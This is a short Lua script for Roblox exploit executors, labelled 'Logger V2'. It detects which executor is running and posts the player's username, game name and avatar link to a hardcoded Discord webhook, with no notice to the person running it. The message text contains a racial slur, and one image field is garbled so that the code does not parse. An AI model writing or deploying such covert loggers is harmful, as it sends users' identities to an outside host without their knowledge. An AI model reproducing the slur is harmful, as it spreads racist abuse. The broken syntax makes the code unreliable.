local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/1438622936092115058/3v3Kdxp5fv9UnAUIgV33Gg7CTpsd9TQHloYQjYl1vYRq0TBX4EQ4YyGodYqYx_QRAykw" -- put ur webhook here dumbos
local data = {
   ["content"] = "Some Dumb Nigger Executed",
   ["embeds"] = {
       {
           ["title"] = "**Someone Executed Logger V2** in: "   ..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name.. " :)",
           ["description"] = "Username: " .. game.Players.LocalPlayer.Name.." with **"..webhookcheck.."**",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {https://cdn.discordapp.com/attachments/1438622068705857588/1438624705107198052/Roblox-Robar-un-Brainrot-SAB.webp?ex=69178f2a&is=69163daa&hm=19345f59e341311d57237103fd0535f0210a73e98e108f72335f175f5a57c1c2
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
